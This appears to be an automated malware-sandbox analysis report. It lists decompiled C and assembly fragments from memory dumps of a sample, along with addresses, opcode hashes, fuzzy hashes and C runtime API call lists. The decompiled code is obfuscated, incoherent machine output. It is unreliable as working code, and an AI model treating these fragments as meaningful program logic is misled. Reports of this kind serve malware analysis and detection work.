                                                                                                                                    				asm("scasb");
                                                                                                                                    				_pop(_t55);
                                                                                                                                    				return _t55 -  *0x532b4e2b;
                                                                                                                                    			}




                                                                                                                                    0x00401fba
                                                                                                                                    0x004020ae
                                                                                                                                    0x004020c1

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e2c3429217d35f771a4d727b13f1c88880f758768c5c3bc1e22432fb3e1ced44
                                                                                                                                    • Instruction ID: ad21d151289e7862f143c557a14f1da3c83bc3cd361945bd38ba316b777fc055
                                                                                                                                    • Opcode Fuzzy Hash: e2c3429217d35f771a4d727b13f1c88880f758768c5c3bc1e22432fb3e1ced44
                                                                                                                                    • Instruction Fuzzy Hash: 5B312C7211061ACFCB19FFBCD6DC9947BB0FA4935471187A9D89A4B88EDB21F221CA41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004021F4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                    				void* _t29;
                                                                                                                                    				void* _t34;
                                                                                                                                    
                                                                                                                                    				_t34 = __edx;
                                                                                                                                    				_t29 = __ecx + 1;
                                                                                                                                    			}





                                                                                                                                    0x004021f4
                                                                                                                                    0x004021f4

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 637a9c73cd95222118a8b3896b3081ff37cfe72cb9cc05887adf06ef62f8e4c8
                                                                                                                                    • Instruction ID: 9857130d6609e5722a50207d3370330b4d05e66679e23d999bc9d2944f8f3879
                                                                                                                                    • Opcode Fuzzy Hash: 637a9c73cd95222118a8b3896b3081ff37cfe72cb9cc05887adf06ef62f8e4c8
                                                                                                                                    • Instruction Fuzzy Hash: 8A11B2710497A58FCB11EEBC8ACD6E57B60FE0231475403AAC6A20F19ADA256553CB87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427703857.0000000000816000.00000040.00000001.sdmp, Offset: 00816000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                    • Instruction ID: 56bff3d89ea071c1eee92d88abd3152a532009fb6079c579136bee14a88ada13
                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                    • Instruction Fuzzy Hash: C8115E727412009FE744DF59DC81EE673AAFF88320B298065E908CB315E675EC42C761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                    			E0040144E(void* __eax, signed int __ebx, void* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				void* _t7;
                                                                                                                                    				signed int _t11;
                                                                                                                                    				intOrPtr _t14;
                                                                                                                                    				signed int _t16;
                                                                                                                                    				signed char* _t18;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t22;
                                                                                                                                    				signed int* _t23;
                                                                                                                                    				void* _t24;
                                                                                                                                    				signed int _t28;
                                                                                                                                    				void* _t31;
                                                                                                                                    				signed int _t32;
                                                                                                                                    				void* _t38;
                                                                                                                                    
                                                                                                                                    				_t27 = __esi;
                                                                                                                                    				_t24 = __edi;
                                                                                                                                    				_t23 = __edx;
                                                                                                                                    				_t21 = __ecx;
                                                                                                                                    				_t7 = __eax;
                                                                                                                                    				asm("aam 0x86");
                                                                                                                                    				asm("cmpsb");
                                                                                                                                    				if(__eflags <= 0) {
                                                                                                                                    					_t9 = __eax + 0xffffffffefebf56c;
                                                                                                                                    					__eflags = __eax + 0xffffffffefebf56c;
                                                                                                                                    					L004011BF(_t9, __edi, __esi, _t31, __eflags);
                                                                                                                                    					_t11 =  *0xeb1a2376;
                                                                                                                                    					_t16 = __ebx &  *_t23;
                                                                                                                                    					__eflags = _t16;
                                                                                                                                    				} else {
                                                                                                                                    					 *0xd77ea629 = _t11;
                                                                                                                                    					 *0xdf6ea629 = _t11;
                                                                                                                                    					 *((intOrPtr*)(_t27 - 0x1de52092)) =  *((intOrPtr*)(_t27 - 0x1de52092)) - _t38;
                                                                                                                                    					_t22 = _t21 + 1;
                                                                                                                                    					asm("das");
                                                                                                                                    					_t18 = _t16 + 1 -  *((intOrPtr*)(_t16 + 1));
                                                                                                                                    					_t32 = _t31 -  *_t18;
                                                                                                                                    					__eflags = _t32;
                                                                                                                                    					if(__eflags >= 0) {
                                                                                                                                    						L16:
                                                                                                                                    						 *((intOrPtr*)(_t18 - 0x3b7cdbfc)) =  *((intOrPtr*)(_t18 - 0x3b7cdbfc)) + _t22;
                                                                                                                                    						__eflags = _t11;
                                                                                                                                    						_push(0x375);
                                                                                                                                    						__ecx =  *__esp;
                                                                                                                                    						__esp = __esp + 4;
                                                                                                                                    						__eax = L004011BF(__eax, __edi, __esi, __ebp, __eflags);
                                                                                                                                    						__eflags = __ebx;
                                                                                                                                    						asm("aam 0xa2");
                                                                                                                                    						_push(__esi);
                                                                                                                                    						asm("out 0x4d, eax");
                                                                                                                                    						asm("cmpsd");
                                                                                                                                    						return __eax;
                                                                                                                                    					} else {
                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                    							 *_t18 =  *_t18 >> 0x68;
                                                                                                                                    							asm("out 0x6c, al");
                                                                                                                                    							_t28 = _t27 -  *((intOrPtr*)(_t23 - 0x40));
                                                                                                                                    							__eflags = _t28;
                                                                                                                                    							_push(_t23);
                                                                                                                                    							_push(_t28);
                                                                                                                                    							asm("rcr bh, 0x82");
                                                                                                                                    							return _t11 ^ 0xb9438e71;
                                                                                                                                    						} else {
                                                                                                                                    							asm("aam 0xd4");
                                                                                                                                    							if(__eflags < 0) {
                                                                                                                                    								_t14 = _v12;
                                                                                                                                    								asm("hlt");
                                                                                                                                    								return _t14;
                                                                                                                                    							} else {
                                                                                                                                    								asm("scasb");
                                                                                                                                    								_push(_t32);
                                                                                                                                    								_push(_t18);
                                                                                                                                    								_push(_t27);
                                                                                                                                    								_push(_t24);
                                                                                                                                    								_push(0x150d);
                                                                                                                                    								goto L16;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}

















                                                                                                                                    0x0040144e
                                                                                                                                    0x0040144e
                                                                                                                                    0x0040144e
                                                                                                                                    0x0040144e
                                                                                                                                    0x0040144e
                                                                                                                                    0x0040144e
                                                                                                                                    0x00401450
                                                                                                                                    0x00401451
                                                                                                                                    0x00401428
                                                                                                                                    0x00401428
                                                                                                                                    0x0040142e
                                                                                                                                    0x00401433
                                                                                                                                    0x00401435
                                                                                                                                    0x00401435
                                                                                                                                    0x00401453
                                                                                                                                    0x00401453
                                                                                                                                    0x00401458
                                                                                                                                    0x00401459
                                                                                                                                    0x0040145f
                                                                                                                                    0x00401460
                                                                                                                                    0x00401462
                                                                                                                                    0x00401464
                                                                                                                                    0x00401464
                                                                                                                                    0x00401466
                                                                                                                                    0x004014e2
                                                                                                                                    0x004014e2
                                                                                                                                    0x004014ea
                                                                                                                                    0x004014f6
                                                                                                                                    0x004014fb
                                                                                                                                    0x004014fe
                                                                                                                                    0x00401508
                                                                                                                                    0x0040150f
                                                                                                                                    0x00401511
                                                                                                                                    0x00401513
                                                                                                                                    0x00401514
                                                                                                                                    0x00401516
                                                                                                                                    0x00401517
                                                                                                                                    0x00401468
                                                                                                                                    0x00401468
                                                                                                                                    0x004014ab
                                                                                                                                    0x004014ae
                                                                                                                                    0x004014b7
                                                                                                                                    0x004014b7
                                                                                                                                    0x004014ba
                                                                                                                                    0x004014bc
                                                                                                                                    0x004014bd
                                                                                                                                    0x004014c0
                                                                                                                                    0x0040146a
                                                                                                                                    0x0040146a
                                                                                                                                    0x0040146c
                                                                                                                                    0x004014c5
                                                                                                                                    0x004014c7
                                                                                                                                    0x004014cc
                                                                                                                                    0x0040146e
                                                                                                                                    0x0040146e
                                                                                                                                    0x004014cf
                                                                                                                                    0x004014d5
                                                                                                                                    0x004014d6
                                                                                                                                    0x004014d7
                                                                                                                                    0x004014de
                                                                                                                                    0x00000000
                                                                                                                                    0x004014de
                                                                                                                                    0x0040146c
                                                                                                                                    0x00401468
                                                                                                                                    0x00401466

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 43e64e5564b3cf1ef989bbc8e4877dff11e5749683d63d2f103519f6866ccd3d
                                                                                                                                    • Instruction ID: 68444f506da6e035a64e0eac8fe9978b242fa84e0a623488cfcbf96ac626c614
                                                                                                                                    • Opcode Fuzzy Hash: 43e64e5564b3cf1ef989bbc8e4877dff11e5749683d63d2f103519f6866ccd3d
                                                                                                                                    • Instruction Fuzzy Hash: 1D019C37D092A48ECF229ABCC9C55D43FB1D73734070907EAD0549B3ABD0187016CB2A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E00401471(signed int __eax, signed int __ebx, void* __ecx, signed int* __edx, void* __edi, void* __eflags, intOrPtr _a116) {
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _t14;
                                                                                                                                    				signed char* _t17;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    				signed int* _t22;
                                                                                                                                    				void* _t23;
                                                                                                                                    				void* _t26;
                                                                                                                                    				signed int _t27;
                                                                                                                                    				void* _t30;
                                                                                                                                    				signed int _t31;
                                                                                                                                    				void* _t37;
                                                                                                                                    
                                                                                                                                    				_t23 = __edi;
                                                                                                                                    				_t22 = __edx;
                                                                                                                                    				_t20 = __ecx;
                                                                                                                                    				_t15 = __ebx;
                                                                                                                                    				_t8 = __eax;
                                                                                                                                    				asm("aam 0x5e");
                                                                                                                                    				asm("fistp qword [ebp-0x3d]");
                                                                                                                                    				if(__eflags < 0) {
                                                                                                                                    					asm("aam 0x86");
                                                                                                                                    					asm("cmpsb");
                                                                                                                                    					if(__eflags <= 0) {
                                                                                                                                    						_t10 = __eax + 0xffffffffefebf56c;
                                                                                                                                    						__eflags = __eax + 0xffffffffefebf56c;
                                                                                                                                    						L004011BF(_t10, __edi, _t26, _t30, __eflags);
                                                                                                                                    						_t8 =  *0xeb1a2376;
                                                                                                                                    						_t15 = __ebx &  *_t22;
                                                                                                                                    						__eflags = _t15;
                                                                                                                                    					} else {
                                                                                                                                    						 *0xd77ea629 = __eax;
                                                                                                                                    						 *0xdf6ea629 = __eax;
                                                                                                                                    						 *((intOrPtr*)(_t26 - 0x1de52092)) =  *((intOrPtr*)(_t26 - 0x1de52092)) - _t37;
                                                                                                                                    						_t21 = _t20 + 1;
                                                                                                                                    						asm("das");
                                                                                                                                    						_t17 = _t15 + 1 -  *((intOrPtr*)(_t15 + 1));
                                                                                                                                    						_t31 = _t30 -  *_t17;
                                                                                                                                    						__eflags = _t31;
                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                    							L19:
                                                                                                                                    							 *((intOrPtr*)(_t17 - 0x3b7cdbfc)) =  *((intOrPtr*)(_t17 - 0x3b7cdbfc)) + _t21;
                                                                                                                                    							__eflags = _t8;
                                                                                                                                    							_push(0x375);
                                                                                                                                    							__ecx =  *__esp;
                                                                                                                                    							__esp = __esp + 4;
                                                                                                                                    							__eax = L004011BF(__eax, __edi, __esi, __ebp, __eflags);
                                                                                                                                    							__al =  *0xd41a2376;
                                                                                                                                    							goto L25;
                                                                                                                                    						} else {
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								 *_t17 =  *_t17 >> 0x68;
                                                                                                                                    								asm("out 0x6c, al");
                                                                                                                                    								_t27 = _t26 -  *((intOrPtr*)(_t22 - 0x40));
                                                                                                                                    								__eflags = _t27;
                                                                                                                                    								_push(_t22);
                                                                                                                                    								_push(_t27);
                                                                                                                                    								asm("rcr bh, 0x82");
                                                                                                                                    								return _t8 ^ 0xb9438e71;
                                                                                                                                    							} else {
                                                                                                                                    								asm("aam 0xd4");
                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                    									_t14 = _v12;
                                                                                                                                    									asm("hlt");
                                                                                                                                    									return _t14;
                                                                                                                                    								} else {
                                                                                                                                    									asm("scasb");
                                                                                                                                    									_push(_t31);
                                                                                                                                    									_push(_t17);
                                                                                                                                    									_push(_t26);
                                                                                                                                    									_push(_t23);
                                                                                                                                    									_push(0x150d);
                                                                                                                                    									goto L19;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					asm("aam 0xd4");
                                                                                                                                    					asm("adc [esi-0x2d], ch");
                                                                                                                                    					_pop(__esi);
                                                                                                                                    					__al = __al - 0xa0;
                                                                                                                                    					asm("o16 aas");
                                                                                                                                    					 *0xec2cc02a = __al;
                                                                                                                                    					asm("outsb");
                                                                                                                                    					asm("fild qword [ebx]");
                                                                                                                                    					__ebp = __ebp -  *__ebx;
                                                                                                                                    					__esi = __esi - _a116;
                                                                                                                                    					__eflags = __esi;
                                                                                                                                    					if(__esi < 0) {
                                                                                                                                    						L25:
                                                                                                                                    						__eflags = __ebx;
                                                                                                                                    						asm("aam 0xa2");
                                                                                                                                    						_push(__esi);
                                                                                                                                    						asm("out 0x4d, eax");
                                                                                                                                    						asm("cmpsd");
                                                                                                                                    						return __eax;
                                                                                                                                    					} else {
                                                                                                                                    						return __eax;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}















                                                                                                                                    0x00401471
                                                                                                                                    0x00401471
                                                                                                                                    0x00401471
                                                                                                                                    0x00401471
                                                                                                                                    0x00401471
                                                                                                                                    0x00401471
                                                                                                                                    0x00401474
                                                                                                                                    0x00401477
                                                                                                                                    0x0040144e
                                                                                                                                    0x00401450
                                                                                                                                    0x00401451
                                                                                                                                    0x00401428
                                                                                                                                    0x00401428
                                                                                                                                    0x0040142e
                                                                                                                                    0x00401433
                                                                                                                                    0x00401435
                                                                                                                                    0x00401435
                                                                                                                                    0x00401453
                                                                                                                                    0x00401453
                                                                                                                                    0x00401458
                                                                                                                                    0x00401459
                                                                                                                                    0x0040145f
                                                                                                                                    0x00401460
                                                                                                                                    0x00401462
                                                                                                                                    0x00401464
                                                                                                                                    0x00401464
                                                                                                                                    0x00401466
                                                                                                                                    0x004014e2
                                                                                                                                    0x004014e2
                                                                                                                                    0x004014ea
                                                                                                                                    0x004014f6
                                                                                                                                    0x004014fb
                                                                                                                                    0x004014fe
                                                                                                                                    0x00401508
                                                                                                                                    0x0040150d
                                                                                                                                    0x00000000
                                                                                                                                    0x00401468
                                                                                                                                    0x00401468
                                                                                                                                    0x004014ab
                                                                                                                                    0x004014ae
                                                                                                                                    0x004014b7
                                                                                                                                    0x004014b7
                                                                                                                                    0x004014ba
                                                                                                                                    0x004014bc
                                                                                                                                    0x004014bd
                                                                                                                                    0x004014c0
                                                                                                                                    0x0040146a
                                                                                                                                    0x0040146a
                                                                                                                                    0x0040146c
                                                                                                                                    0x004014c5
                                                                                                                                    0x004014c7
                                                                                                                                    0x004014cc
                                                                                                                                    0x0040146e
                                                                                                                                    0x0040146e
                                                                                                                                    0x004014cf
                                                                                                                                    0x004014d5
                                                                                                                                    0x004014d6
                                                                                                                                    0x004014d7
                                                                                                                                    0x004014de
                                                                                                                                    0x00000000
                                                                                                                                    0x004014de
                                                                                                                                    0x0040146c
                                                                                                                                    0x00401468
                                                                                                                                    0x00401466
                                                                                                                                    0x00401479
                                                                                                                                    0x00401479
                                                                                                                                    0x0040147b
                                                                                                                                    0x0040147e
                                                                                                                                    0x0040147f
                                                                                                                                    0x00401481
                                                                                                                                    0x00401483
                                                                                                                                    0x00401488
                                                                                                                                    0x00401489
                                                                                                                                    0x0040148b
                                                                                                                                    0x0040148d
                                                                                                                                    0x0040148d
                                                                                                                                    0x00401490
                                                                                                                                    0x0040150f
                                                                                                                                    0x0040150f
                                                                                                                                    0x00401511
                                                                                                                                    0x00401513
                                                                                                                                    0x00401514
                                                                                                                                    0x00401516
                                                                                                                                    0x00401517
                                                                                                                                    0x00401492
                                                                                                                                    0x00401492
                                                                                                                                    0x00401492
                                                                                                                                    0x00401490

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e293d3d3c0107c13d2bef86dc7539ac2e95b1e52cdc41ccf062490d83fd10892
                                                                                                                                    • Instruction ID: 4d0b70728d2c78a60f1285290afd08df74c3a6777d1093d7e2ecde4108df3aae
                                                                                                                                    • Opcode Fuzzy Hash: e293d3d3c0107c13d2bef86dc7539ac2e95b1e52cdc41ccf062490d83fd10892
                                                                                                                                    • Instruction Fuzzy Hash: 5CF05931A846649EDF218EFC86881643FB1FA223107444BFBC0842F0F7D8382155C72E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                    			E00402127(void* __eax, void* __ebx, void* __ecx, void* __edx, unsigned char* __esi) {
                                                                                                                                    
                                                                                                                                    				asm("scasb");
                                                                                                                                    				 *__esi =  *__esi >> 0x8f;
                                                                                                                                    				asm("rcr bh, 0x51");
                                                                                                                                    				return 0x7b2b2bb0;
                                                                                                                                    			}



                                                                                                                                    0x0040212f
                                                                                                                                    0x00402196
                                                                                                                                    0x0040219a
                                                                                                                                    0x0040219d

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 35ebc35181450642cc36696570045868f80a6d4bea8fdcb54f1b4132cedafdc5
                                                                                                                                    • Instruction ID: 8364892ff80c4533be1e45446e668a087e8422db9e4d9050431392d4297a4fd6
                                                                                                                                    • Opcode Fuzzy Hash: 35ebc35181450642cc36696570045868f80a6d4bea8fdcb54f1b4132cedafdc5
                                                                                                                                    • Instruction Fuzzy Hash: B8C09B1E164B5546D5691D344C853D25DC0DB563F1B74174CD1F5816DD8D5DC0439404
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0ec116dea4794b1bfb0bde2d905613b790afdbb1549f1df98b8c1fccc1a0999d
                                                                                                                                    • Instruction ID: 8665cb109229e54cdd26b4de3b831b2a072d4e93e209b37ddc81cd02c89a0fdb
                                                                                                                                    • Opcode Fuzzy Hash: 0ec116dea4794b1bfb0bde2d905613b790afdbb1549f1df98b8c1fccc1a0999d
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 004230F2
                                                                                                                                    • _wcscat_s.LIBCMTD ref: 0042330A
                                                                                                                                      • Part of subcall function 004271C0: __errno.LIBCMTD ref: 00427214
                                                                                                                                      • Part of subcall function 004271C0: __invalid_parameter.LIBCMTD ref: 00427232
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 00423313
                                                                                                                                      • Part of subcall function 0041A590: __invoke_watson.LIBCMTD ref: 0041A5B1
                                                                                                                                    • _wcscat_s.LIBCMTD ref: 00423342
                                                                                                                                      • Part of subcall function 004271C0: _memset.LIBCMT ref: 0042729B
                                                                                                                                      • Part of subcall function 004271C0: __errno.LIBCMTD ref: 004272D9
                                                                                                                                      • Part of subcall function 004271C0: __invalid_parameter.LIBCMTD ref: 004272F7
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042334B
                                                                                                                                    • __errno.LIBCMTD ref: 00423367
                                                                                                                                    • __errno.LIBCMTD ref: 00423374
                                                                                                                                    • __snwprintf_s.LIBCMTD ref: 004233A4
                                                                                                                                      • Part of subcall function 00420D20: __vsnprintf_s_l.LIBCMTD ref: 00420D42
                                                                                                                                    • __errno.LIBCMTD ref: 004233D5
                                                                                                                                    • __errno.LIBCMTD ref: 004233E5
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423422
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042342B
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423506
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042350F
                                                                                                                                    • __itow_s.LIBCMTD ref: 004230E9
                                                                                                                                      • Part of subcall function 004275A0: _xtow_s@20.LIBCMTD ref: 004275CB
                                                                                                                                    • __errno.LIBCMTD ref: 00423178
                                                                                                                                    • __errno.LIBCMTD ref: 00423185
                                                                                                                                    • __strftime_l.LIBCMTD ref: 004231A9
                                                                                                                                    • __errno.LIBCMTD ref: 004231DA
                                                                                                                                    • __errno.LIBCMTD ref: 004231EA
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423227
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 00423230
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423283
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042328C
                                                                                                                                    • _wcscat_s.LIBCMTD ref: 004232BD
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 004232C6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno$__invoke_watson_if_error$_wcscpy_s$_wcscat_s$__invalid_parameter$__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
                                                                                                                                    • String ID: R<$h@[@$h@[@$hHW@$t8j$t9j$Y@
                                                                                                                                    • API String ID: 2214760961-596147245
                                                                                                                                    • Opcode ID: f89087cafd1c7e7146bc5447285ddfea915ad56eecb3243100028d4b92075b24
                                                                                                                                    • Instruction ID: 45ab13e19d6d4de1188432b19098a6a7fd7c9437b9cbdcfd77255558f2fad1fc
                                                                                                                                    • Opcode Fuzzy Hash: f89087cafd1c7e7146bc5447285ddfea915ad56eecb3243100028d4b92075b24
                                                                                                                                    • Instruction Fuzzy Hash: 720271B1A40714ABDB20DF50DC4AFDF7778AB48706F5041AAB6087A2C1D67C9B84CF99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __errno.LIBCMTD ref: 00427A46
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427A5B
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427A91
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427AB2
                                                                                                                                    • wcsncnt.LIBCMTD ref: 00427AE9
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427B4F
                                                                                                                                    • __errno.LIBCMTD ref: 00427D8B
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427DA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale$UpdateUpdate::~_$__errno$wcsncnt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 551976084-0
                                                                                                                                    • Opcode ID: 91c00467f29de1187a84d342770b8335cf879fc123f60d56276cee4bfbe269d3
                                                                                                                                    • Instruction ID: 19d2b186efd84de4868467185dd6cb419c95be88161fb661cef6a6a08671f810
                                                                                                                                    • Opcode Fuzzy Hash: 91c00467f29de1187a84d342770b8335cf879fc123f60d56276cee4bfbe269d3
                                                                                                                                    • Instruction Fuzzy Hash: 29E13831A14218EFCB04DF94D990BEEB7B1FF45304F60815AE4156B2A1DB38AE42CF99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                    • String ID: -$9
                                                                                                                                    • API String ID: 3451365851-1631151375
                                                                                                                                    • Opcode ID: 69ebda3c1eaeda35ea94f29388418fd9264882509dc564e0fe4c4bbe02705599
                                                                                                                                    • Instruction ID: e32abe3bd0deab2e086104420cf3d57bd1f3489060862308a856ffc4aee659b3
                                                                                                                                    • Opcode Fuzzy Hash: 69ebda3c1eaeda35ea94f29388418fd9264882509dc564e0fe4c4bbe02705599
                                                                                                                                    • Instruction Fuzzy Hash: 7CF158B0E012299BDB24DF54DC99BAEB7B4FF84304F5481DAE409A7281D7389E80CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3455034128-2366072709
                                                                                                                                    • Opcode ID: b1ff1169a91f061947da2b839b58a9159c71eb7c80aef2aed3d540a618a7659c
                                                                                                                                    • Instruction ID: b6a3f9d515ef1ef3e6a2fb7ccd957e235d1b441fdea388a795fca59ea42e8813
                                                                                                                                    • Opcode Fuzzy Hash: b1ff1169a91f061947da2b839b58a9159c71eb7c80aef2aed3d540a618a7659c
                                                                                                                                    • Instruction Fuzzy Hash: 66F139B1E002299FDB24CF54DC81BAEB7B5FF84304F54819AE509A7241D738AE85CF5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
                                                                                                                                    • String ID: -
                                                                                                                                    • API String ID: 1135781078-2547889144
                                                                                                                                    • Opcode ID: b06cf7f0029964d44c85a0236f8d31e520f714e398d7efa443595447d1f4346d
                                                                                                                                    • Instruction ID: 4730b19b041c3bb3b168cc6bc2b9d13f66965915396ce7ba384321d615822954
                                                                                                                                    • Opcode Fuzzy Hash: b06cf7f0029964d44c85a0236f8d31e520f714e398d7efa443595447d1f4346d
                                                                                                                                    • Instruction Fuzzy Hash: 52A19DB0E012289BDB20DB55DC49BEEB7B4EF44304F5481DAE4197A281D7789ED0CF9A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3689974179-0
                                                                                                                                    • Opcode ID: 3ad636b7cbb21bc7a69b0e2ca12164be3f991341c05c49dc382bf6ea3cd7cb27
                                                                                                                                    • Instruction ID: f985891abb1110824def8d7feca30b6f637b63f4aed52b1ca283b97b289b9e6b
                                                                                                                                    • Opcode Fuzzy Hash: 3ad636b7cbb21bc7a69b0e2ca12164be3f991341c05c49dc382bf6ea3cd7cb27
                                                                                                                                    • Instruction Fuzzy Hash: 6FA180B0E002299BDF24DF54DC85BAEB770AF44304F54809AE6097B281D778AE85CF5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
